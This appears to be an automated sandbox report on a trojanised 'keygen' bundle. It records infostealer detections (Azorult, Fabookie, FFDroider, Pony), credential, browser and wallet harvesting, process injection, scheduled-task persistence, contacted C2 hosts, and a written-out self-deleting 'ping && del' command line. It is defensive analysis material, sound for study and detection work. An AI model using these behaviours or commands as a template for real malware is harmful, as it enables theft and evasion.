N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 iplogger.org udp
US 104.26.2.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 172.217.16.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
US 104.26.2.46:443 iplogger.org tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
GB 195.200.9.241:443 evaexpand.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.205:443 evaexpand.com tcp
US 8.8.8.8:53 crl.microsoft.com udp
GB 2.19.117.18:80 crl.microsoft.com tcp

Files

memory/2756-0-0x00000000002A0000-0x00000000002B8000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win10v2004-20241007-en

Max time kernel

94s

Max time network

136s

Command Line

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

Signatures

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-2878641211-696417878-3864914810-1000\Control Panel\International\Geo\Nation C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Processes

C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe

"C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe" >> NUL

C:\Windows\SysWOW64\PING.EXE

ping 127.0.0.1

Network

Country Destination Domain Proto
US 8.8.8.8:53 104.219.191.52.in-addr.arpa udp
US 8.8.8.8:53 iplogger.org udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 c.pki.goog udp
GB 142.250.187.227:80 c.pki.goog tcp
US 8.8.8.8:53 ip-api.com udp
US 208.95.112.1:80 ip-api.com tcp
US 8.8.8.8:53 evaexpand.com udp
GB 195.200.9.135:443 evaexpand.com tcp
US 8.8.8.8:53 46.3.26.104.in-addr.arpa udp
US 8.8.8.8:53 227.187.250.142.in-addr.arpa udp
US 8.8.8.8:53 1.112.95.208.in-addr.arpa udp
US 8.8.8.8:53 64.159.190.20.in-addr.arpa udp
US 8.8.8.8:53 135.9.200.195.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 32.169.19.2.in-addr.arpa udp
US 104.26.3.46:443 iplogger.org tcp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
US 8.8.8.8:53 171.39.242.20.in-addr.arpa udp
US 8.8.8.8:53 98.117.19.2.in-addr.arpa udp
US 8.8.8.8:53 0.205.248.87.in-addr.arpa udp
US 8.8.8.8:53 29.243.111.52.in-addr.arpa udp

Files

memory/4516-0-0x00000000014A0000-0x00000000014B8000-memory.dmp

Analysis: behavioral11

Detonation Overview

Submitted

2024-11-08 22:25

Reported

2024-11-08 22:27

Platform

win7-20240903-en

Max time kernel

57s

Max time network

146s

Command Line

cmd /c "C:\Users\Admin\AppData\Local\Temp\keygen.bat"

Signatures

Azorult

trojan infostealer azorult

Azorult family

azorult

Detect Fabookie payload

Description Indicator Process Target
N/A N/A N/A N/A

FFDroider

stealer ffdroider

FFDroider payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Fabookie

spyware stealer fabookie

Fabookie family

fabookie

Ffdroider family

ffdroider

GCleaner

loader gcleaner

Gcleaner family

gcleaner

OnlyLogger

loader onlylogger

Onlylogger family

onlylogger

Pony family

pony

Pony,Fareit

rat spyware stealer pony

OnlyLogger payload

Description Indicator Process Target
N/A N/A N/A N/A

Loads dropped DLL

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Windows\SysWOW64\WerFault.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

Reads data files stored by FTP clients

spyware stealer

Reads user/profile data of web browsers

spyware stealer

Unsecured Credentials: Credentials In Files

credential_access stealer

Accesses Microsoft Outlook accounts

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses Microsoft Outlook profiles

collection
Description Indicator Process Target
Key opened \REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A

Accesses cryptocurrency files/wallets, possible credential harvesting

spyware

Checks installed software on the system

discovery

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A iplogger.org N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 624 set thread context of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
File opened for modification C:\Windows\winnetdriv.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A

Enumerates physical storage devices

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\PING.EXE N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\f2217e5f.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\PBrowFile28.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\md1_1eaf.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\SysWOW64\cmd.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Windows\winnetdriv.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\RarSFX0\Setup.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe N/A

System Network Configuration Discovery: Internet Connection Discovery

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\cmd.exe N/A
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Runs ping.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\PING.EXE N/A

Scheduled Task/Job: Scheduled Task

persistence execution
Description Indicator Process Target
N/A N/A C:\Windows\system32\schtasks.exe N/A
N/A N/A C:\Windows\system32\schtasks.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\2.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\PublicDwlBrowser188.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeImpersonatePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeTcbPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeChangeNotifyPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeCreateTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeBackupPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeRestorePrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeAssignPrimaryTokenPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\chrome3.exe N/A
Token: SeDebugPrivilege N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\ss.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2768 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe
PID 3020 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3020 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3020 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3020 wrote to memory of 2784 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-1.exe
PID 3020 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3020 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3020 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3020 wrote to memory of 2788 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-6.exe
PID 3020 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3020 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3020 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3020 wrote to memory of 2864 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe
PID 3020 wrote to memory of 840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3020 wrote to memory of 840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3020 wrote to memory of 840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 3020 wrote to memory of 840 N/A C:\Windows\system32\cmd.exe C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe
PID 2864 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2864 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2864 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2864 wrote to memory of 2836 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-3.exe C:\Windows\winnetdriv.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 2768 wrote to memory of 624 N/A C:\Users\Admin\AppData\Local\Temp\keygen-pr.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 840 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 840 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 840 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 840 wrote to memory of 1632 N/A C:\Users\Admin\AppData\Local\Temp\keygen-step-4.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1632 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1632 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1632 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 1632 wrote to memory of 2216 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\Crack.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
PID 624 wrote to memory of 2172 N/A C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe C:\Users\Admin\AppData\Local\Temp\RarSFX0\key.exe
